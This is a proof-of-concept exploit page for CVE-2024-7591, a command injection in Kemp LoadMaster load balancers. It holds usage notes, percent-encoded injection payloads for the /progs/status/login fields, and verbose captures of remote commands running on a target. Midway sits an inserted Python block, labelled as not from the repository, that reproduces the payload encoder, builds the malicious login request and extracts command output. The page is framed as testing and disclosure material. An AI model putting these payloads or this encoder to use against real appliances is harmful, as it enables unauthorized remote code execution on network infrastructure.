
POC details: 0d37162bb39f3819784459274d740330b21b551f

Source
Related vulnerability
Title: Kemp LoadMaster security vulnerability (CVE-2024-7591)
Description: Kemp LoadMaster is a load balancer from Kemp. Kemp LoadMaster 7.2.60.0 and earlier versions contain a vulnerability caused by improper input validation that allows operating system command injection.
Description
These PoC python scripts test the Kemp LoadMaster for remote code execution.
Introduction
# CVE-2024-7591-PoC

THIS TOOL IS INTENDED FOR TESTING PURPOSES ONLY

These scripts were based on Marius Walter's writeup on the specifics of this exploit. You can read their post at:
https://insinuator.net/2024/11/vulnerability-disclosure-command-injection-in-kemp-loadmaster-load-balancer-cve-2024-7591/

These are python3 scripts meant for testing a LoadMaster against CVE-2024-7591.


USAGE:

KempRCECommandGenerator.py takes a bash command and converts it into the encoded form needed to run
remote commands against a vulnerable LoadMaster. Its output is meant to be used with Burp
Suite or some other tool to send the remote command to the server.

Example:
```
$: python3 ./KempRCECommandGenerator.py
Enter your command: echo hello
Put this output in the token, token2, user, or pass field
in the POST request to /progs/status/login.

%01%78%27%3b%65%63%68%6f%20%68%65%6c%6c%6f%3b%65%63%68%6f%20%27%01

$: 
```
Your command output should be present in the response after the HTTP headers and before the html code.
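The encoding step the generator performs, worked through as an added example that is not code from the repository: it rebuilds the percent-encoded payload shown above byte for byte, assembles the login POST body in the shape the verbose KempExploit.py runs below print, and extracts the command output from the region of the response that sits before the HTML. The sample response body is constructed to mirror the first verbose example further down; the token values, the `pwn` username and the field names are taken from that output, and nothing is sent over the network.

```python
import re
import secrets

# Added example (not the repository's code). It reproduces the encoding that
# KempRCECommandGenerator.py prints and parses the response shape shown in the
# README's verbose examples. Nothing here talks to the network.

# Injection frame as read off the generator output: 0x01, then x' to close the
# single-quoted value the field lands in, the command, then echo ' to re-open
# a quote so the original closing quote stays balanced. Why the 0x01 bytes are
# there is not explained on this page; they are copied from the output as-is.
PREFIX = "\x01x';"
SUFFIX = ";echo '\x01"


def encode_command(cmd: str) -> str:
    """Wrap cmd in the frame and percent-encode every byte (lowercase hex)."""
    raw = (PREFIX + cmd + SUFFIX).encode("utf-8")
    return "".join(f"%{b:02x}" for b in raw)


def decode_payload(encoded: str) -> str:
    """Inverse of encode_command, for reading a payload back out of a request."""
    if not re.fullmatch(r"(?:%[0-9a-fA-F]{2})+", encoded):
        raise ValueError("expected a run of %xx escapes")
    return bytes.fromhex(encoded.replace("%", "")).decode("utf-8")


def build_login_body(token: str, token2: str, cmd: str) -> str:
    """Form body for POST /progs/status/login with the payload in the pass
    field, matching the request KempExploit.py prints. token/token2 are the
    values the script scrapes from the login page; here they are parameters
    (assumed to be plain hex strings, as in the README output)."""
    return (f"token={token}&token2={token2}&logsub=Login"
            f"&user=pwn&pass={encode_command(cmd)}")


# A response line that looks like an HTTP header, e.g. "X-Frame-Options: ..."
HEADER_LINE = re.compile(r"^[A-Za-z][A-Za-z0-9-]*: ")


def extract_output(body: str) -> str:
    """Command output sits before the CGI's own headers and the HTML page.
    Keep everything before <!DOCTYPE, then drop trailing header-like and blank
    lines. Caveat: a command whose final output line itself looks like a
    header ("Key: value") loses that line."""
    head = body.split("<!DOCTYPE", 1)[0]
    lines = head.splitlines()
    while lines and (not lines[-1].strip() or HEADER_LINE.match(lines[-1])):
        lines.pop()
    return "\n".join(lines).strip()


def probe_marker() -> str:
    """Random marker for a vulnerability check. A fixed word such as
    'exploitable' could be reflected by a page that echoes input back; a
    fresh nonce only appears if the shell actually ran echo."""
    return "kemp" + secrets.token_hex(8)


def probe_succeeded(body: str, marker: str) -> bool:
    """True when the marker came back in the command-output region."""
    return marker in extract_output(body)


# Constructed response body mirroring the first verbose example in the README.
SAMPLE_RESPONSE = (
    "exploitable\n"
    "\n"
    "X-Frame-Options: SAMEORIGIN\n"
    "X-XSS-Protection: 1; mode=block\n"
    "X-Content-Type-Options: nosniff\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\n"
    "Connection: close\n"
    "Cache-Control: no-cache, max-age=0, must-revalidate, no-store\n"
    "\n"
    "<!DOCTYPE html>\n<html>\n<head>\n<script>\nalert(\"Login Failed\");\n"
    "</script>\n</head>\n</html>\n"
)

if __name__ == "__main__":
    print(encode_command("echo hello"))
    print(build_login_body("d8a7863c4a3b59a56b42403cf9100435",
                           "b1e63802eb144a814c00ffa8c870d3c6", "echo hello"))
    print(repr(extract_output(SAMPLE_RESPONSE)))
```

`encode_command("echo hello")` yields exactly the `%01%78%27%3b...%27%01` string the generator prints above, and `extract_output` returns `exploitable` for the sample body, which is the check the script's own "server confirmed vulnerable" message rests on. The random marker is the one deliberate departure from the script, which probes with the fixed word `exploitable`.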




KempExploit.py is a stand-alone python script for testing whether the vulnerability is exploitable or for running
a custom command.

PREREQUISITES:

requests

urllib3

bs4 (pip package beautifulsoup4)

textwrap (part of the Python standard library; nothing to install)



Example:
```
$: python3 ./KempExploit.py -u 10.0.1.50 --verbose --secure
Enter your command to send or leave blank to test: 
It looks like I found a target and some tokens. Do you want to proceed? [y/N]y

---------------- request ----------------
POST https://10.0.1.50:443/progs/status/login
User-Agent: python-requests/2.32.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 196

token=d8a7863c4a3b59a56b42403cf9100435&token2=b1e63802eb144a814c00ffa8c870d3c6&logsub=Login&user=pwn&pass=%01%78%78%78%27%3b%65%63%68%6f%20%65%78%70%6c%6f%69%74%61%62%6c%65%3b%65%63%68%6f%20%27%01
---------------- response ----------------
200 OK https://10.0.1.50:443/progs/status/login
Date: Tue, 12 Aug 2025 00:55:32 GMT
Connection: Keep-Alive
Content-Type: text/html
Transfer-Encoding: chunked

exploitable

X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Connection: close
Cache-Control: no-cache, max-age=0, must-revalidate, no-store

<!DOCTYPE html>
<html>
<head>
<script>
alert("Login Failed");
</script>
<script>
if(parent && parent != window){
parent.location = "/";
parent.location.reload(true);
}
</script>
</head>
</html>


Login POST status code: 200
✅ 'exploitable' found in response, server confirmed vulnerable.
$:
```

Example 2:
```
$: python3 ./KempExploit.py -u 10.0.1.50 --secure --verbose
Enter your command to send or leave blank to test: ping -c2 10.0.1.16
It looks like I found a target and some tokens. Do you want to proceed? [y/N]y
Running the command ping -c2 10.0.1.16
The encoded command looks like: %01%78%27%3b%70%69%6e%67%20%2d%63%32%20%31%30%2e%30%2e%31%2e%31%36%3b%65%63%68%6f%20%27%01

---------------- request ----------------
POST https://10.0.1.50:443/progs/status/login
User-Agent: python-requests/2.32.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 196

token=a236deda9bb1d4930a331e92caf269ad&token2=a5a5587fd8babd690851f32a85faabb8&logsub=Login&user=pwn&pass=%01%78%27%3b%70%69%6e%67%20%2d%63%32%20%31%30%2e%30%2e%31%2e%31%36%3b%65%63%68%6f%20%27%01
---------------- response ----------------
200 OK https://10.0.1.50:443/progs/status/login
Date: Tue, 12 Aug 2025 00:59:08 GMT
Connection: Keep-Alive
Content-Type: text/html
Transfer-Encoding: chunked

PING 10.0.1.16 (10.0.1.16) 56(84) bytes of data.
64 bytes from 10.0.1.16: icmp_seq=1 ttl=63 time=6.71 ms
64 bytes from 10.0.1.16: icmp_seq=2 ttl=63 time=5.34 ms

--- 10.0.1.16 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 5.349/6.030/6.712/0.685 ms

X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Connection: close
Cache-Control: no-cache, max-age=0, must-revalidate, no-store

<!DOCTYPE html>
<html>
<head>
<script>
alert("Login Failed");
</script>
<script>
if(parent && parent != window){
parent.location = "/";
parent.location.reload(true);
}
</script>
</head>
</html>


Login POST status code: 200
Command sent successfully.
$: 
```


File snapshot

```
[4.0K] /data/pocs/0d37162bb39f3819784459274d740330b21b551f
├── [5.2K] KempExploit.py
├── [1.4K] KempRCECommandGenerator.py
├── [ 11K] LICENSE
└── [4.4K] README.md

0 directories, 4 files
```